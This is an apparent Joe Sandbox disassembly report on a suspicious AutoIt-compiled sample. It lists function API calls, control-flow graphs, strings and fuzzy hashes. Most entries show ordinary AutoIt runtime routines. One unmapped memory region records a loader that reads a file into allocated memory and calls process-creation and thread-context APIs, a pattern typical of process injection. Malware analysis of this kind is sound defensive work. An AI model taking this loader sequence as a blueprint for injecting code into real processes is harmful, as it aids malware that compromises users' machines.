                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003471A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037E8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0037E909
                                                        • RegCloseKey.ADVAPI32(?), ref: 0037E947
                                                        • _wcscat.LIBCMT ref: 0037E9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 369703a6fe3d15c7b7907eef8fc8c9d870fbcc465c62d7cd4d991ae428a3289a
                                                        • Instruction ID: 02b97b8933857fd32f368a91e9c8add5161bda8b36812d97918529badac6c3df
                                                        • Opcode Fuzzy Hash: 369703a6fe3d15c7b7907eef8fc8c9d870fbcc465c62d7cd4d991ae428a3289a
                                                        • Instruction Fuzzy Hash: 3071C0724083019EC316EF25ED8199BBBE8FF89310F41457EF446EB1A0DB75A908CB56

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 760 343633-343681 762 3436e1-3436e3 760->762 763 343683-343686 760->763 762->763 766 3436e5 762->766 764 3436e7 763->764 765 343688-34368f 763->765 770 3436ed-3436f0 764->770 771 37d0cc-37d0fa call 351070 call 351093 764->771 767 343695-34369a 765->767 768 34374b-343753 PostQuitMessage 765->768 769 3436ca-3436d2 DefWindowProcW 766->769 775 37d154-37d168 call 3a2527 767->775 776 3436a0-3436a2 767->776 777 343711-343713 768->777 778 3436d8-3436de 769->778 772 343715-34373c SetTimer RegisterWindowMessageW 770->772 773 3436f2-3436f3 770->773 806 37d0ff-37d106 771->806 772->777 782 34373e-343749 CreatePopupMenu 772->782 779 37d06f-37d072 773->779 780 3436f9-34370c KillTimer call 34443a call 343114 773->780 775->777 799 37d16e 775->799 783 343755-343764 call 3444a0 776->783 784 3436a8-3436ad 776->784 777->778 792 37d074-37d076 779->792 793 37d0a8-37d0c7 MoveWindow 779->793 780->777 782->777 783->777 788 3436b3-3436b8 784->788 789 37d139-37d140 784->789 797 37d124-37d134 call 3a2d36 788->797 798 3436be-3436c4 788->798 789->769 795 37d146-37d14f call 397c36 789->795 801 37d097-37d0a3 SetFocus 792->801 802 37d078-37d07b 792->802 793->777 795->769 797->777 798->769 798->806 799->769 801->777 802->798 807 37d081-37d092 call 351070 802->807 806->769 811 37d10c-37d11f call 34443a call 34434a 806->811 807->777 811->769
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 003436D2
                                                        • KillTimer.USER32(?,00000001), ref: 003436FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0034371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034372A
                                                        • CreatePopupMenu.USER32 ref: 0034373E
                                                        • PostQuitMessage.USER32(00000000), ref: 0034374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated$%=
                                                        • API String ID: 129472671-273969447
                                                        • Opcode ID: 1b10beb36bd429c51c5df7ed226e7dbe051d4efbbe6604a88846a49f75f46051
                                                        • Instruction ID: f6c5e593e313819e72a250edb315795d2069c5473e9cf3fc09c7f922671bddc8
                                                        • Opcode Fuzzy Hash: 1b10beb36bd429c51c5df7ed226e7dbe051d4efbbe6604a88846a49f75f46051
                                                        • Instruction Fuzzy Hash: 8C412AB2100506ABDF276F24DC49F7A3AD9EB00340F554135F902EF2E2CA78BD109B65

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00343A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00343A5F
                                                        • LoadIconW.USER32(00000063), ref: 00343A76
                                                        • LoadIconW.USER32(000000A4), ref: 00343A88
                                                        • LoadIconW.USER32(000000A2), ref: 00343A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AC0
                                                        • RegisterClassExW.USER32(?), ref: 00343B16
                                                          • Part of subcall function 00343041: GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                          • Part of subcall function 00343041: RegisterClassExW.USER32(00000030), ref: 0034309E
                                                          • Part of subcall function 00343041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                          • Part of subcall function 00343041: InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                          • Part of subcall function 00343041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                          • Part of subcall function 00343041: LoadIconW.USER32(000000A9), ref: 003430F2
                                                          • Part of subcall function 00343041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 2b7350e262791321e31ca9fc958aa9d28dac1ae1fea8bf955a15411f7ecdd123
                                                        • Instruction ID: a57c9e54dcae05206adb28da18954712e79374d608579767ad6a442d54a90c61
                                                        • Opcode Fuzzy Hash: 2b7350e262791321e31ca9fc958aa9d28dac1ae1fea8bf955a15411f7ecdd123
                                                        • Instruction Fuzzy Hash: 88213974910308EFEB11DFA4EE49B9E7FB5EB08711F00016AE504BA2A1D3B566508F98

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R@
                                                        • API String ID: 1825951767-3808460316
                                                        • Opcode ID: 77a7388cd04da4cfa3856b77fb536f765121be4d8d059e1e5dc18fef6cff54c1
                                                        • Instruction ID: 99e2acc5d7ba2a504bd428b878c20da48190e3e2b7f579d27c335469d72c7c0b
                                                        • Opcode Fuzzy Hash: 77a7388cd04da4cfa3856b77fb536f765121be4d8d059e1e5dc18fef6cff54c1
                                                        • Instruction Fuzzy Hash: 01A12C7291021DAACF16EBA4DC95EEEB7B9FF15310F40042AE415BF191DF746A08CB60

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00360162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360193
                                                          • Part of subcall function 00360162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0036019B
                                                          • Part of subcall function 00360162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003601A6
                                                          • Part of subcall function 00360162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003601B1
                                                          • Part of subcall function 00360162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003601B9
                                                          • Part of subcall function 00360162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003601C1
                                                          • Part of subcall function 003560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0034F930), ref: 00356154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0034F9CD
                                                        • OleInitialize.OLE32(00000000), ref: 0034FA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 003845C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID: <W@$\T@$%=$S@
                                                        • API String ID: 1986988660-3831757665
                                                        • Opcode ID: c2d96dec79c104af2e11dc4bea63454cf92e5a7b11c6832678530a6ed6ee99cb
                                                        • Instruction ID: 313ea6f997809685061c9951369ce616a3849886897e7fba559b1ebecbc0e22f
                                                        • Opcode Fuzzy Hash: c2d96dec79c104af2e11dc4bea63454cf92e5a7b11c6832678530a6ed6ee99cb
                                                        • Instruction Fuzzy Hash: 6A81BFB0911A40DFC785EF39AE49B9B7BE5EB88306750813AD418EB372E77448848F1D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 983 c713c8-c71476 call c6ede8 986 c7147d-c714a3 call c722d8 CreateFileW 983->986 989 c714a5 986->989 990 c714aa-c714ba 986->990 991 c715f5-c715f9 989->991 998 c714c1-c714db VirtualAlloc 990->998 999 c714bc 990->999 992 c7163b-c7163e 991->992 993 c715fb-c715ff 991->993 995 c71641-c71648 992->995 996 c71601-c71604 993->996 997 c7160b-c7160f 993->997 1002 c7169d-c716b2 995->1002 1003 c7164a-c71655 995->1003 996->997 1004 c71611-c7161b 997->1004 1005 c7161f-c71623 997->1005 1000 c714e2-c714f9 ReadFile 998->1000 1001 c714dd 998->1001 999->991 1006 c71500-c71540 VirtualAlloc 1000->1006 1007 c714fb 1000->1007 1001->991 1010 c716b4-c716bf VirtualFree 1002->1010 1011 c716c2-c716ca 1002->1011 1008 c71657 1003->1008 1009 c71659-c71665 1003->1009 1004->1005 1012 c71625-c7162f 1005->1012 1013 c71633 1005->1013 1014 c71547-c71562 call c72528 1006->1014 1015 c71542 1006->1015 1007->991 1008->1002 1016 c71667-c71677 1009->1016 1017 c71679-c71685 1009->1017 1010->1011 1012->1013 1013->992 1023 c7156d-c71577 1014->1023 1015->991 1019 c7169b 1016->1019 1020 c71687-c71690 1017->1020 1021 c71692-c71698 1017->1021 1019->995 1020->1019 1021->1019 1024 c715aa-c715be call c72338 1023->1024 1025 c71579-c715a8 call c72528 1023->1025 1030 c715c2-c715c6 1024->1030 1031 c715c0 1024->1031 1025->1023 1033 c715d2-c715d6 1030->1033 1034 c715c8-c715cc CloseHandle 1030->1034 1031->991 1035 c715e6-c715ef 1033->1035 1036 c715d8-c715e3 VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C71499
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C716BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2133386192.0000000000C6E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C6E000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c6e000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction ID: c31d71743d59995282dfcabe5217ce8108ca50a0d3814fd15c563d35740881bf
                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction Fuzzy Hash: 38A12870E00209EBDB14CFA8C898BEEBBB5FF48304F248559E915BB280D7759A81DF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1114 3439d5-343a45 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00343A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00343A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                                        • Instruction ID: 4cddf0b51f4a1c5ddd6490b280d254647f40bd5fa17dda66e96a57cc2ac13fdb
                                                        • Opcode Fuzzy Hash: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                                        • Instruction Fuzzy Hash: 4DF01770500294BEEA2157236C0CE6B2E7EDBC6F50F00407EB904F2160C2751C10CEB4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1467 c71198-c712c8 call c6ede8 call c71088 CreateFileW 1474 c712cf-c712df 1467->1474 1475 c712ca 1467->1475 1478 c712e6-c71300 VirtualAlloc 1474->1478 1479 c712e1 1474->1479 1476 c7137f-c71384 1475->1476 1480 c71304-c7131b ReadFile 1478->1480 1481 c71302 1478->1481 1479->1476 1482 c7131f-c71359 call c710c8 call c70088 1480->1482 1483 c7131d 1480->1483 1481->1476 1488 c71375-c7137d ExitProcess 1482->1488 1489 c7135b-c71370 call c71118 1482->1489 1483->1476 1488->1476 1489->1488
                                                        APIs
                                                          • Part of subcall function 00C71088: Sleep.KERNELBASE(000001F4), ref: 00C71099
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C712BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2133386192.0000000000C6E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C6E000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c6e000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: FC3JQ5U1UFFVV82
                                                        • API String ID: 2694422964-48615935
                                                        • Opcode ID: 0d8b0bea2dda39e23b7f9ad302189639e130f580d3db1a21f45a31318f0adb3e
                                                        • Instruction ID: 026edfacc35bca944fb10d9b067e25be87f084e3f92878dd0613f753e0461712
                                                        • Opcode Fuzzy Hash: 0d8b0bea2dda39e23b7f9ad302189639e130f580d3db1a21f45a31318f0adb3e
                                                        • Instruction Fuzzy Hash: 73519430D04249EBEF11DBB4C855BEEBB79AF15300F148199E618BB2C1D7790B45CB66

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1491 34407c-344092 1492 34416f-344173 1491->1492 1493 344098-3440ad call 347a16 1491->1493 1496 3440b3-3440d3 call 347bcc 1493->1496 1497 37d3c8-37d3d7 LoadStringW 1493->1497 1500 37d3e2-37d3fa call 347b2e call 346fe3 1496->1500 1501 3440d9-3440dd 1496->1501 1497->1500 1509 3440ed-34416a call 362de0 call 34454e call 362dbc Shell_NotifyIconW call 345904 1500->1509 1513 37d400-37d41e call 347cab call 346fe3 call 347cab 1500->1513 1504 344174-34417d call 348047 1501->1504 1505 3440e3-3440e8 call 347b2e 1501->1505 1504->1509 1505->1509 1509->1492 1513->1509
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0037D3D7
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        • _memset.LIBCMT ref: 003440FC
                                                        • _wcscpy.LIBCMT ref: 00344150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00344160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: faeb71b64ae831db37e097b12199472217e592ba5fe07bb293b9bca8d507f90d
                                                        • Instruction ID: c16aaf4d0bb25f86cf3c57364ca424db892f517e0e2a649c894598f6e60f058b
                                                        • Opcode Fuzzy Hash: faeb71b64ae831db37e097b12199472217e592ba5fe07bb293b9bca8d507f90d
                                                        • Instruction Fuzzy Hash: 4C318D71008704AFD722EB60DC4AFEB77E8EF44304F20452EF5899A0A1DB74A658CB96
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                        • Instruction ID: 01cc1000e36f6d3f7ef8eabdaea79b8c94eb07fe16afabe547ecf35df0b08ba4
                                                        • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                        • Instruction Fuzzy Hash: A751F630A00B05DBCB278F69C88466E77B6AF41321F25C779F937962D8DB709D508B40
                                                        APIs
                                                          • Part of subcall function 00344DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344E0F
                                                        • _free.LIBCMT ref: 0037E263
                                                        • _free.LIBCMT ref: 0037E2AA
                                                          • Part of subcall function 00346A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346BAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: ac38e3c0ac88024d26ff8a06c69f7a4ce9c600454d46f1c92dfb2a87615858b2
                                                        • Instruction ID: b7db576c9d327fcc6f6cf5b1966d69aac9b90d0cf138ad7e7b869475a1a4cee1
                                                        • Opcode Fuzzy Hash: ac38e3c0ac88024d26ff8a06c69f7a4ce9c600454d46f1c92dfb2a87615858b2
                                                        • Instruction Fuzzy Hash: 0D916E71910219DFCF16EFA4CC829EDB7B8FF09310B11846AF815AF2A2DB75A945CB50
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003435A1,SwapMouseButtons,00000004,?), ref: 003435D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 003435F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 00343617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                                        • Instruction ID: de96766eb7374da28f2e1b2bc7a95a09846b954bf061f96a978116487ca974c0
                                                        • Opcode Fuzzy Hash: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                                        • Instruction Fuzzy Hash: EF114571614219BFDB229F64DC80EAEBBFDEF04740F128469E805DB210E275AE409BA0
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00C708B5
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C708D9
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C708FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2133386192.0000000000C6E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C6E000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c6e000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                        • Instruction ID: 4a60cbb05fca85ca9921b4fa6550cbeab07dd09133721b32d6a8ceab1d835a3c
                                                        • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                        • Instruction Fuzzy Hash: A662EA30A14258DBEB24CFA4C851BDEB376EF58300F2091A9E11DEB391E7759E81CB59
                                                        APIs
                                                          • Part of subcall function 00344EE5: _fseek.LIBCMT ref: 00344EFD
                                                          • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9824
                                                          • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9837
                                                        • _free.LIBCMT ref: 003A96A2
                                                        • _free.LIBCMT ref: 003A96A9
                                                        • _free.LIBCMT ref: 003A9714
                                                          • Part of subcall function 00362D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00369A24), ref: 00362D69
                                                          • Part of subcall function 00362D55: GetLastError.KERNEL32(00000000,?,00369A24), ref: 00362D7B
                                                        • _free.LIBCMT ref: 003A971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
